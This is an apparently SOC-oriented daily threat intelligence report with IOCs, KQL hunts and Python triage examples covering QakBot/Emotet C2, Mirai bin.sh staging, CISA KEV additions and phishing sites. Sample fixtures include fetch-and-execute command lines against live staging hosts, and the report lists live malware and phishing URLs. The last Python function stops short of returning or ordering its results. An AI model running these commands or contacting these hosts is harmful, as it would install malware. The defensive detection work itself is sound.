โ† Back to Dashboard
May 14, 2026

Daily Threat Intelligence Report — 2026-05-14

25 IOCs | 12 TTPs | 12 KQL Queries
Executive Summary

Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed by Feodotracker across US, UK, and Japan nodes, alongside a surge in Mirai botnet ELF samples and an AsyncRAT trojan tracked in MalwareBazaar. CISA has added five critical vulnerabilities to the Known Exploited Vulnerabilities catalog, including a Palo Alto Networks PAN-OS out-of-bounds write (CVE-2026-0300) allowing unauthenticated root-level RCE and a cPanel authentication bypass (CVE-2026-41940), both requiring immediate patching. AlienVault OTX reports active Kimsuky APT activity leveraging a CHM dropper and three-stage PowerShell kill chain, with 38 IOCs published. SOC teams should immediately block all five Feodotracker C2 IPs, apply CISA KEV patches on an emergency basis, and hunt for AsyncRAT and Mirai indicators across Linux and Windows endpoints.

#1

Active QakBot and Emotet C2 Infrastructure — Multi-Region Banking Trojan Campaign

CRITICAL TA505

Feodotracker has confirmed four active QakBot C2 servers and one Emotet C2 server operational within the last 24 hours, spanning infrastructure in the United States (50.16.16.211, 34.204.119.63, 162.243.103.246), United Kingdom (178.62.3.223), and Japan (27.133.154.218). QakBot and Emotet are historically associated with TA505 operations and serve as primary delivery mechanisms for ransomware payloads including Cl0p and Dridex. The geographic distribution across three countries suggests deliberate infrastructure diversification to evade regional blocklists and maintain persistence. Organizations with financial sector exposure or unpatched Windows endpoints should treat these C2 IPs as high-priority blocking targets and hunt for beaconing activity immediately.

🔴 Indicators of Compromise
IP 162.243.103.246 Emotet C2 server — US-hosted, Feodotracker confirmed active within 24h
IP 50.16.16.211 QakBot C2 server — US-hosted, Feodotracker confirmed active within 24h
IP 34.204.119.63 QakBot C2 server — US-hosted (AWS range), Feodotracker confirmed active within 24h
IP 178.62.3.223 QakBot C2 server — UK-hosted (DigitalOcean range), Feodotracker confirmed active within 24h
IP 27.133.154.218 QakBot C2 server — Japan-hosted, Feodotracker confirmed active within 24h
🟣 MITRE ATT&CK TTPs
T1566.001 Spearphishing Attachment MITRE →
T1071.001 Application Layer Protocol — Web Protocols C2 MITRE →
T1105 Ingress Tool Transfer MITRE →
T1078 Valid Accounts MITRE →
🟢 Hunt Queries
MDE Hunt for C2 connections to QakBot and Emotet infrastructure

Detects outbound connections to all five Feodotracker-confirmed QakBot and Emotet C2 servers active in the last 24 hours.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, LocalIP, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect QakBot/Emotet beaconing — periodic connection pattern analysis

Identifies hosts with repetitive, periodic connections to QakBot/Emotet C2 IPs indicative of malware beaconing behavior.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| summarize ConnectionCount=count(), FirstSeen=min(TimeGenerated), LastSeen=max(TimeGenerated), Ports=make_set(RemotePort) by DeviceName, RemoteIP, InitiatingProcessFileName
| where ConnectionCount > 3
| extend DurationMinutes = datetime_diff('minute', LastSeen, FirstSeen)
| order by ConnectionCount desc
MDI Detect lateral movement following QakBot credential theft

Hunts for suspicious NTLM authentication patterns from hosts that may be QakBot-compromised, consistent with TA505 lateral movement TTPs.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| summarize LogonCount=count(), DistinctTargets=dcount(DeviceName), TargetDevices=make_set(DeviceName) by AccountDisplayName, IPAddress
| where LogonCount > 5 or DistinctTargets > 3
| order by LogonCount desc
SENTINEL QakBot and Emotet C2 traffic — perimeter firewall and proxy detection

Identifies outbound traffic to Feodotracker-confirmed C2 IPs across all network security log sources ingested into Sentinel.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor, DeviceProduct
| order by TimeGenerated desc
✅ Recommended Actions
→ IMMEDIATE: Block all five Feodotracker C2 IPs (162.243.103.246, 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, proxy, and DNS sinkholes
→ IMMEDIATE: Run the MDE KQL beaconing query to identify any hosts currently communicating with QakBot/Emotet C2 infrastructure and isolate confirmed compromised devices
→ IMMEDIATE: Submit all five C2 IPs to EDR platform threat intelligence feeds for automated blocking of any process attempting outbound connection
→ SHORT-TERM: Execute the MDI NTLM lateral movement query to identify potential credential-theft-driven lateral movement originating from QakBot-infected hosts
→ SHORT-TERM: Review email gateway quarantine logs for macro-enabled Office documents and HTML smuggling attachments delivered in the past 72 hours
→ SHORT-TERM: Enable enhanced logging on all endpoints for network connection events, ensuring RemoteIP and InitiatingProcessCommandLine fields are captured
→ LONG-TERM: Implement network segmentation to limit lateral movement capability if QakBot achieves initial foothold; enforce NTLM relay mitigations (SMB signing, LDAP signing)
→ LONG-TERM: Subscribe to Feodotracker automated feeds for daily C2 IP blocklist updates via TAXII/STIX or direct download integration into NGFW
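Added example, not code from the report: the check that the two MDE DeviceNetworkEvents hunts above express in KQL (exact match on the five Feodotracker C2 addresses, then a per host/process summary with a count threshold), re-implemented in Python over a constructed set of connection events so the summary can be inspected offline. It goes one step beyond the KQL by scoring how evenly spaced the contacts are, which is what separates a scheduled callback from a one-off or bursty contact. Device names, process names and timestamps are constructed; only the C2 addresses come from this section.

```python
"""Beaconing triage for the QakBot/Emotet C2 addresses listed above.

Added example, not code from the report: it re-implements the two MDE
DeviceNetworkEvents hunts (exact C2 match, then per host/process summary)
in plain Python over constructed events, and adds an inter-arrival jitter
score so that evenly spaced callbacks stand out from one-off or bursty
contacts. Device names, process names and timestamps are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# C2 IPs taken from the Feodotracker indicators in this section.
QAKBOT_EMOTET_C2 = {
    "162.243.103.246", "50.16.16.211", "34.204.119.63",
    "178.62.3.223", "27.133.154.218",
}

T0 = datetime(2026, 5, 14, 8, 0, 0)


def _event(ts, device, remote_ip, port, process):
    """One network event in the shape of a DeviceNetworkEvents row."""
    return {"ts": ts, "device": device, "remote_ip": remote_ip,
            "port": port, "process": process}


# Constructed telemetry: a host calling back every five minutes with a few
# seconds of jitter, a host with two contacts, a host with irregular
# contacts, and a host that only talks to a benign resolver.
SAMPLE_EVENTS = (
    [_event(T0 + timedelta(seconds=300 * i + j), "WS-ACCT-07",
            "50.16.16.211", 443, "wermgr.exe")
     for i, j in enumerate([0, 4, -3, 5, 1, -2])]
    + [_event(T0 + timedelta(minutes=m), "WS-HR-12", "178.62.3.223", 443,
              "regsvr32.exe") for m in (3, 40)]
    + [_event(T0 + timedelta(minutes=m), "SRV-FILE-01", "34.204.119.63",
              8443, "rundll32.exe") for m in (1, 2, 30, 31, 120)]
    + [_event(T0 + timedelta(minutes=m), "WS-DEV-03", "8.8.8.8", 53,
              "svchost.exe") for m in range(0, 30, 5)]
)


def c2_contacts(events, c2_ips=QAKBOT_EMOTET_C2):
    """Every connection to a listed C2 address (the first hunt query)."""
    return [e for e in events if e["remote_ip"] in c2_ips]


def summarise(events, c2_ips=QAKBOT_EMOTET_C2):
    """Group C2 contacts by (device, remote_ip, process), as the KQL
    summarize does, and add a jitter score: population std-dev of the
    gaps between consecutive contacts divided by their mean. 0 means
    perfectly periodic; None when there are fewer than three contacts."""
    groups = defaultdict(list)
    for e in c2_contacts(events, c2_ips):
        groups[(e["device"], e["remote_ip"], e["process"])].append(e)
    summary = {}
    for key, evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds()
                for a, b in zip(evs, evs[1:])]
        jitter = None
        if len(gaps) >= 2 and mean(gaps) > 0:
            jitter = pstdev(gaps) / mean(gaps)
        span = evs[-1]["ts"] - evs[0]["ts"]
        summary[key] = {
            "count": len(evs),
            "first_seen": evs[0]["ts"],
            "last_seen": evs[-1]["ts"],
            "ports": sorted({e["port"] for e in evs}),
            "duration_minutes": int(span.total_seconds() // 60),
            "jitter": jitter,
        }
    return summary


def beaconing_candidates(events, min_count=4, max_jitter=0.2):
    """Groups that are both repeated (count > 3, as in the KQL) and evenly
    spaced. Every entry in summarise() still deserves a look, since one
    contact with a confirmed C2 is an incident; this only ranks the
    periodic ones first."""
    return {key: row for key, row in summarise(events).items()
            if row["count"] >= min_count
            and row["jitter"] is not None and row["jitter"] <= max_jitter}


if __name__ == "__main__":
    for key, row in summarise(SAMPLE_EVENTS).items():
        print(key, row["count"], row["duration_minutes"], row["jitter"])
    print("periodic:", list(beaconing_candidates(SAMPLE_EVENTS)))
```

On the constructed data the five-minute caller scores a jitter near 0.02 and is the only beaconing candidate, the two-contact host gets no score at all, and the irregular host scores above 1.0 yet still appears in the summary because any contact with a confirmed C2 address is worth an alert; the jitter only orders the triage.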
#2

Mirai Botnet Resurgence — Four New ELF Samples and Active Linux Malware Download Infrastructure

HIGH Unknown Threat Actor

MalwareBazaar has catalogued four new Mirai ELF binary samples within the past 24 hours (hashes: 775042943516f540da439945aa5fb43b296892b8211699cbd8c0610d5dc09b0f, ff1aa2a8e6fb56a6a5e43ee8ab77017454160b406003d1ee758f465afd225b60, 6abcb230fb1233ce9b56099a94a19c35c7ca199667130970edc47691f3fd3709, bd62de3c345b01497d327c369bf335cb48b66ba2a117a850081130a8a7f91152), indicating active botnet build-out or refresh of Mirai variant infrastructure. URLhaus concurrently tracks five active malware download URLs delivering shell scripts (bin.sh) and unclassified payloads from IPs spanning multiple countries, consistent with Mirai's known propagation methodology of exploiting weak SSH/Telnet credentials and vulnerable IoT/Linux services. The simultaneous appearance of four distinct ELF samples alongside active download infrastructure suggests a coordinated Mirai operator campaign targeting Linux servers and IoT devices. Organizations running internet-exposed Linux systems, routers, NVRs, or IoT devices should conduct immediate inventory and credential review.

🔴 Indicators of Compromise
HASH 775042943516f540da439945aa5fb43b296892b8211699cbd8c0610d5dc09b0f Mirai ELF binary — MalwareBazaar confirmed, tagged elf+Mirai
HASH ff1aa2a8e6fb56a6a5e43ee8ab77017454160b406003d1ee758f465afd225b60 Mirai ELF binary — MalwareBazaar confirmed, tagged elf+Mirai
HASH 6abcb230fb1233ce9b56099a94a19c35c7ca199667130970edc47691f3fd3709 Mirai ELF binary — MalwareBazaar confirmed, tagged elf+Mirai
HASH bd62de3c345b01497d327c369bf335cb48b66ba2a117a850081130a8a7f91152 Mirai ELF binary — MalwareBazaar confirmed, tagged elf+Mirai
URL http://175.174.105.125:44962/bin.sh Active Mirai/malware download staging URL serving shell script payload — URLhaus confirmed
URL http://188.149.206.91:59551/bin.sh Active malware download URL serving shell script — URLhaus confirmed
URL http://113.237.44.254:54019/bin.sh Active malware download URL serving shell script — URLhaus confirmed
URL http://125.44.46.158:59841/bin.sh Active malware download URL serving shell script — URLhaus confirmed
URL http://123.4.196.139:57224/bin.sh Active malware download URL serving shell script — URLhaus confirmed
HASH c52f07795607c12042cdff7cb2a29cdbbac6f40828495eb90659165a330a6ef7 AsyncRAT ELF/EXE botnet trojan — MalwareBazaar confirmed, tagged AsyncRAT+botnet+c2+trojan
🟣 MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE →
T1059.004 Unix Shell MITRE →
T1498 Network Denial of Service MITRE →
T1105 Ingress Tool Transfer MITRE →
🟢 Hunt Queries
MDE Hunt for Mirai ELF sample execution by file hash

Detects execution or file creation events matching confirmed Mirai ELF binary hashes from MalwareBazaar.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    '775042943516f540da439945aa5fb43b296892b8211699cbd8c0610d5dc09b0f',
    'ff1aa2a8e6fb56a6a5e43ee8ab77017454160b406003d1ee758f465afd225b60',
    '6abcb230fb1233ce9b56099a94a19c35c7ca199667130970edc47691f3fd3709',
    'bd62de3c345b01497d327c369bf335cb48b66ba2a117a850081130a8a7f91152'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect connections to Mirai malware download staging servers

Identifies outbound connections to URLhaus-confirmed Mirai payload staging IPs and to the non-standard high ports used for bin.sh delivery. The port-only branch also matches unrelated traffic that happens to use those ephemeral ports, so hits without an IP match are lower confidence and need the process context before escalation.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
   or RemotePort in (44962, 59551, 54019, 59841, 57224)
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect shell script download and execute pattern — Mirai propagation chain

Hunts for wget/curl downloading shell scripts from non-standard high ports followed by chmod or bash execution, consistent with Mirai's bin.sh propagation methodology.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in ('wget', 'curl', 'bash', 'sh')
| where ProcessCommandLine has_any ('bin.sh', '44962', '59551', '54019', '59841', '57224', '175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Mirai staging server traffic — proxy and firewall detection

Identifies all traffic to URLhaus-confirmed Mirai download staging servers across network perimeter logs.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in ('175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
   or RequestURL has_any ('bin.sh', '175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
✅ Recommended Actions
→ IMMEDIATE: Block all five URLhaus malware download staging IPs (175.174.105.125, 188.149.206.91, 113.237.44.254, 125.44.46.158, 123.4.196.139) and associated high ports at perimeter firewall
→ IMMEDIATE: Submit all four Mirai ELF hashes to EDR/AV platforms for immediate blocking and retrospective scan across all Linux endpoints
→ IMMEDIATE: Conduct emergency audit of internet-exposed SSH/Telnet services; enforce key-based authentication and disable password authentication on all Linux servers
→ IMMEDIATE: Check AsyncRAT hash (c52f07795607c12042cdff7cb2a29cdbbac6f40828495eb90659165a330a6ef7) against EDR telemetry for any execution events
→ SHORT-TERM: Deploy the MDE KQL queries for Mirai ELF hash detection and staging server connections across all Linux and hybrid endpoints enrolled in MDE
→ SHORT-TERM: Review IoT device inventory; apply firmware updates and change all default credentials on routers, NVRs, cameras, and embedded Linux devices
→ SHORT-TERM: Implement egress filtering to block outbound connections on non-standard high ports (>1024) from Linux servers unless explicitly required
→ LONG-TERM: Integrate URLhaus automated blocklist feeds into NGFW and DNS filtering to receive real-time updates on Mirai staging infrastructure
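Added example, not code from the report or from any vendor tool: the download-and-execute chain that the MDE DeviceProcessEvents hunt above catches by substring matching, redone in Python with proper URL parsing over constructed Linux command lines. Parsing the URL lets the check give exact matches on the URLhaus staging servers high confidence, still flag a bin.sh fetch from an IP literal on an ephemeral port that is not yet on any list, recognise when the fetch is chained or piped straight into a shell, and survive a malformed port without crashing. The sample command lines, including the 203.0.113.x and 198.51.100.x documentation addresses, are constructed; the staging IPs and ports are the URLhaus entries from this section.

```python
"""Download-and-execute chain triage for Linux process command lines.

Added example, not from the report or any vendor tool. The MDE
DeviceProcessEvents hunt above matches substrings; this version parses
the URL out of the command line so it can (a) give exact matches on the
URLhaus staging servers high confidence, (b) still flag a bin.sh fetch
from an IP literal on an ephemeral port that is not on any list yet, and
(c) notice when the download is chained or piped straight into a shell.
The sample command lines are constructed; the staging IPs and ports are
the URLhaus entries listed in this section.
"""
import re
from urllib.parse import urlsplit

MIRAI_STAGING = {  # host -> port, from the URLhaus URLs above
    "175.174.105.125": 44962, "188.149.206.91": 59551,
    "113.237.44.254": 54019, "125.44.46.158": 59841,
    "123.4.196.139": 57224,
}

DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp)\b")
URL_RE = re.compile(r"https?://[^\s'\"|;&]+")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Ways the fetched script gets run within the same command line.
EXEC_RE = re.compile(
    r"\|\s*(?:ba)?sh\b|;\s*(?:ba)?sh\s|chmod\s+\+x|chmod\s+[0-7]{3,4}\b|\./\S*\.sh\b"
)


def _host_port_path(url):
    """Parse a URL defensively: a non-numeric port makes .port raise."""
    parts = urlsplit(url)
    try:
        port = parts.port
    except ValueError:
        port = None
    return parts.hostname, port, parts.path


def analyse_command(cmdline):
    """Return a finding for one command line, or None when nothing matches."""
    if not DOWNLOADER_RE.search(cmdline):
        return None
    hits, reasons = [], []
    for url in URL_RE.findall(cmdline):
        host, port, path = _host_port_path(url)
        if host is None or port is None:
            continue
        if MIRAI_STAGING.get(host) == port:
            hits.append((host, port))
            reasons.append(f"known staging server {host}:{port}")
        elif IPV4_RE.match(host) and port > 1024 and path.endswith(".sh"):
            hits.append((host, port))
            reasons.append(f"shell script from IP literal on ephemeral port {host}:{port}")
    if not hits:
        return None
    exact = any(MIRAI_STAGING.get(h) == p for h, p in hits)
    chained = EXEC_RE.search(cmdline) is not None
    if chained:
        reasons.append("download chained into execution")
    # Exact IOC match or fetch-and-run in one line is high; a lone
    # heuristic fetch is medium and needs the process tree for context.
    confidence = "high" if exact or chained else "medium"
    return {"cmdline": cmdline, "hosts": hits, "confidence": confidence,
            "reasons": reasons}


def triage(cmdlines):
    """Findings for every command line that matches, in input order."""
    return [f for f in (analyse_command(c) for c in cmdlines) if f]


# Constructed sample command lines (no real telemetry).
SAMPLE_PROCESS_LINES = [
    "wget http://175.174.105.125:44962/bin.sh -O /tmp/bin.sh; chmod +x /tmp/bin.sh; sh /tmp/bin.sh",
    "curl -s -o /tmp/b.sh http://203.0.113.9:51222/bin.sh",
    "curl https://deb.debian.org/debian/dists/bookworm/Release -o Release",
    "wget http://198.51.100.7:8080/update.tar.gz",
    "apt-get install -y vim",
    "wget http://123.4.196.139:57224/bin.sh -O- | sh",
    "wget http://203.0.113.9:bad/bin.sh",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_PROCESS_LINES):
        print(finding["confidence"], finding["hosts"], finding["reasons"])
```

Three of the seven constructed lines produce findings: the two exact staging-server fetches (both chained into execution) at high confidence, and the fetch from an unlisted IP literal at medium. The Debian mirror, the tarball from a hostname-less IP, the package install and the malformed-port line all fall through cleanly.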
#3

Critical CISA KEV Additions — PAN-OS RCE, Ivanti EPMM, cPanel Auth Bypass, Linux Kernel Privilege Escalation, and LiteLLM SQL Injection Actively Exploited

MEDIUM Unknown Threat Actor

CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog today, all requiring immediate action. The most critical is CVE-2026-0300 affecting Palo Alto Networks PAN-OS, an out-of-bounds write in the User-ID Authentication Portal enabling unauthenticated root-level remote code execution on PA-Series and VM-Series firewalls — patches are available as of 2026-05-13. CVE-2026-41940 affects WebPros cPanel & WHM and WP2, allowing unauthenticated remote attackers to bypass authentication entirely and access the hosting control panel. CVE-2026-6973 in Ivanti EPMM allows authenticated remote administrators to achieve RCE, while CVE-2026-31431 in the Linux Kernel enables local privilege escalation, and CVE-2026-42208 in BerriAI LiteLLM exposes a SQL injection risk in AI proxy infrastructure. AlienVault OTX additionally reports an Adobe Reader zero-day exploited since at least December 2025, further expanding the vulnerability exploitation surface. Organizations must prioritize emergency patching of PAN-OS and cPanel given the unauthenticated attack vectors.

🔴 Indicators of Compromise
CVE CVE-2026-0300 Palo Alto Networks PAN-OS — Out-of-bounds write in User-ID Authentication Portal, unauthenticated RCE with root privileges on PA-Series and VM-Series firewalls. Patches released 2026-05-13.
CVE CVE-2026-41940 WebPros cPanel & WHM and WP2 — Authentication bypass in login flow, unauthenticated remote attackers gain full control panel access.
CVE CVE-2026-6973 Ivanti Endpoint Manager Mobile (EPMM) — Improper input validation allowing remotely authenticated administrator to achieve RCE.
CVE CVE-2026-31431 Linux Kernel — Incorrect resource transfer between spheres enabling local privilege escalation.
CVE CVE-2026-42208 BerriAI LiteLLM — SQL injection allowing unauthenticated read and potential modification of AI proxy database and managed credentials.
URL https://meta-data-shredding-cleanup-utility.wiki/8f17c972-8dcd-48e2-9699-dd33797c674c/google.ct Active malware download URL using deceptive wiki domain — URLhaus confirmed malware_download
URL https://remote-sensor-proxy-tunnel-config.wiki/38435a52-4879-40be-aba3-b5f64322ae6a/google.ct Active malware download URL using deceptive wiki domain with UUID path — URLhaus confirmed malware_download
URL https://instagram.wtcx.lol/VMdfpJbTim Active Instagram credential phishing URL — OpenPhish confirmed
URL https://registra-2026-credi-demon.vercel.app/ Active financial credential phishing lure hosted on Vercel — OpenPhish confirmed
URL https://next-netflix-23rd-kappa.vercel.app/detail/931285?type=movie Active Netflix credential phishing page hosted on Vercel — OpenPhish confirmed
🟣 MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE →
T1068 Exploitation for Privilege Escalation MITRE →
T1190 Exploit Public-Facing Application — SQL Injection MITRE →
T1566.002 Spearphishing Link MITRE →
🟢 Hunt Queries
MDE Detect access to CISA KEV phishing and malware download infrastructure

Identifies endpoint connections to URLhaus malware download URLs and OpenPhish confirmed phishing domains added in the last 24 hours.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl has_any (
    'meta-data-shredding-cleanup-utility.wiki',
    'remote-sensor-proxy-tunnel-config.wiki',
    'instagram.wtcx.lol',
    'registra-2026-credi-demon.vercel.app',
    'next-netflix-23rd-kappa.vercel.app',
    '9xbc3jzp.disorientbreak.digital',
    'blockbook-tls-1.nodes.zelcore.io'
)
| project TimeGenerated, DeviceName, AccountName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL PAN-OS CVE-2026-0300 exploitation attempt detection — User-ID Portal anomalies

Hunts for anomalous inbound requests to PAN-OS User-ID Authentication Portal that may indicate CVE-2026-0300 exploitation attempts.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DeviceVendor == 'Palo Alto Networks'
| where Activity has_any ('captive-portal', 'user-id', 'auth-portal', 'authentication')
| where Reason has_any ('malformed', 'invalid', 'overflow', 'exception') or Message has_any ('out-of-bounds', 'segfault', 'crash')
| project TimeGenerated, SourceIP, DestinationIP, Activity, Reason, Message, DeviceProduct
| order by TimeGenerated desc
SENTINEL cPanel CVE-2026-41940 authentication bypass — unauthorized access detection

Flags cPanel/WHM endpoints receiving an unusually high volume of login or session activity (more than 10 events per URL per hour). CommonSecurityLog does not expose whether an authentication challenge was completed, so this is a coarse volume-based proxy for bypass attempts; confirm any hit against the cPanel access and session logs on the host.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('cpanel', 'whm', 'webmail', 'cPanel')
| where Activity has_any ('login', 'auth', 'session')
| summarize LoginCount=count(), SourceIPs=make_set(SourceIP) by DestinationIP, RequestURL, bin(TimeGenerated, 1h)
| where LoginCount > 10
| order by LoginCount desc
MDE Linux Kernel CVE-2026-31431 privilege escalation — post-exploitation detection

Hunts for shells and interpreters run by non-root Linux accounts whose command lines touch setuid bits, root ownership, the credential files, or an interactive switch to root, the follow-on activity expected after a successful CVE-2026-31431 exploit. DeviceProcessEvents carries no OS platform column, so the query scopes to Linux devices through DeviceInfo.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
// DeviceProcessEvents has no OS column; restrict to Linux devices via DeviceInfo
| join kind=inner (DeviceInfo | where OSPlatform == 'Linux' | distinct DeviceId) on DeviceId
| where AccountName != 'root' and AccountName != 'SYSTEM'
| where InitiatingProcessAccountName != 'root'
| where FileName in ('bash', 'sh', 'python', 'python3', 'perl')
| where ProcessCommandLine has_any ('chmod +s', 'chown root', 'setuid', '/etc/passwd', '/etc/shadow', 'sudo -i', 'su root')
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName
| order by TimeGenerated desc
✅ Recommended Actions
→ IMMEDIATE: Apply Palo Alto Networks patches for CVE-2026-0300 released 2026-05-13; as interim workaround restrict User-ID Authentication Portal access to trusted zones only and disable if not required
→ IMMEDIATE: Apply vendor patches for CVE-2026-41940 in cPanel WHM and WP2; if patches unavailable, implement network-level access controls restricting WHM/cPanel access to authorized management IPs only
→ IMMEDIATE: Patch Ivanti EPMM for CVE-2026-6973; review EPMM admin account list for unauthorized privileged accounts and rotate all administrative credentials
→ IMMEDIATE: Apply Linux Kernel patches for CVE-2026-31431 across all Linux servers; prioritize internet-facing and production systems; audit sudoers configuration for unnecessary privileges
→ IMMEDIATE: Patch or disable BerriAI LiteLLM if CVE-2026-42208 patches are unavailable; rotate all AI API credentials (OpenAI, Anthropic, etc.) managed by any LiteLLM proxy instance
→ IMMEDIATE: Block OpenPhish-confirmed phishing domains at DNS and proxy layer, particularly Vercel-hosted Netflix and Instagram lures targeting employee credentials
→ IMMEDIATE: Block URLhaus deceptive .wiki download domains (meta-data-shredding-cleanup-utility.wiki, remote-sensor-proxy-tunnel-config.wiki) at DNS and proxy
→ SHORT-TERM: Run the Sentinel and MDE KQL queries for CVE-2026-0300, CVE-2026-41940, and CVE-2026-31431 exploitation indicators across all relevant infrastructure
→ SHORT-TERM: Alert SOC Tier 2 to treat any PAN-OS authentication portal anomaly as high-severity incident pending patch application given active exploitation in wild
→ LONG-TERM: Establish automated CISA KEV monitoring with 24-hour SLA for patch assessment and 72-hour SLA for patch application on internet-facing systems
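Added example, not part of the report or of CISA's tooling, showing what the automated KEV monitoring in the last action looks like once the SLAs are written down: the feed snapshot is constructed in the shape of the KEV JSON (vulnerabilities[].cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse) using the five CVE IDs from this section, and the asset inventory, host names and dueDate values are constructed as well. For each entry it finds the matching assets, sets the 24-hour assessment deadline, applies the 72-hour patch deadline where an affected asset is internet-facing (falling back to the feed's own dueDate otherwise), and orders the work so entries with exposed assets come first.

```python
"""CISA KEV intake with the SLAs from the recommended actions above.

Added example, not part of the report or of CISA's tooling. The feed
snapshot is constructed in the shape of the KEV JSON using the five CVE
IDs from this section; the asset inventory and dueDate values are
constructed too. Each entry gets its matching assets, a 24-hour
assessment deadline, a 72-hour patch deadline when an affected asset is
internet-facing (CISA's own dueDate otherwise), and overdue flags.
"""
from datetime import datetime, timedelta, timezone

ASSESS_SLA = timedelta(hours=24)
PATCH_SLA_INTERNET_FACING = timedelta(hours=72)

KEV_SNAPSHOT = {  # constructed; field names follow the KEV JSON feed
    "vulnerabilities": [
        {"cveID": "CVE-2026-0300", "vendorProject": "Palo Alto Networks",
         "product": "PAN-OS", "dateAdded": "2026-05-14",
         "dueDate": "2026-06-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-41940", "vendorProject": "WebPros",
         "product": "cPanel & WHM", "dateAdded": "2026-05-14",
         "dueDate": "2026-06-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-6973", "vendorProject": "Ivanti",
         "product": "Endpoint Manager Mobile", "dateAdded": "2026-05-14",
         "dueDate": "2026-06-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-31431", "vendorProject": "Linux",
         "product": "Kernel", "dateAdded": "2026-05-14",
         "dueDate": "2026-06-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-42208", "vendorProject": "BerriAI",
         "product": "LiteLLM", "dateAdded": "2026-05-14",
         "dueDate": "2026-06-04", "knownRansomwareCampaignUse": "Unknown"},
    ]
}

# Constructed asset inventory, tagged the way a CMDB would hold it.
ASSETS = [
    {"name": "fw-edge-01", "vendor": "Palo Alto Networks", "product": "PAN-OS 11.2", "internet_facing": True},
    {"name": "web-host-03", "vendor": "WebPros", "product": "cPanel & WHM", "internet_facing": True},
    {"name": "ml-proxy-01", "vendor": "BerriAI", "product": "LiteLLM proxy", "internet_facing": False},
    {"name": "build-07", "vendor": "Linux", "product": "Kernel 6.8", "internet_facing": False},
    {"name": "wiki-01", "vendor": "Atlassian", "product": "Confluence", "internet_facing": True},
]


def kev_date(value):
    """KEV dates are bare YYYY-MM-DD; treat them as UTC midnight."""
    return datetime.strptime(value, "%Y-%m-%d").replace(tzinfo=timezone.utc)


def affected_assets(entry, assets):
    """Vendor must match exactly; product is a case-insensitive substring
    match so that 'PAN-OS' finds 'PAN-OS 11.2'."""
    vendor, product = entry["vendorProject"].lower(), entry["product"].lower()
    return [a for a in assets
            if a["vendor"].lower() == vendor and product in a["product"].lower()]


def kev_workload(feed, assets, now):
    """One row per KEV entry with deadlines and overdue flags at time `now`."""
    rows = []
    for entry in feed["vulnerabilities"]:
        added = kev_date(entry["dateAdded"])
        matches = affected_assets(entry, assets)
        exposed = any(a["internet_facing"] for a in matches)
        assess_by = added + ASSESS_SLA
        patch_by = added + PATCH_SLA_INTERNET_FACING if exposed else kev_date(entry["dueDate"])
        rows.append({
            "cve": entry["cveID"],
            "assets": [a["name"] for a in matches],
            "internet_facing": exposed,
            "assess_by": assess_by,
            "patch_by": patch_by,
            "assess_overdue": now > assess_by,
            "patch_overdue": now > patch_by,
            "ransomware_use": entry.get("knownRansomwareCampaignUse", "Unknown"),
        })
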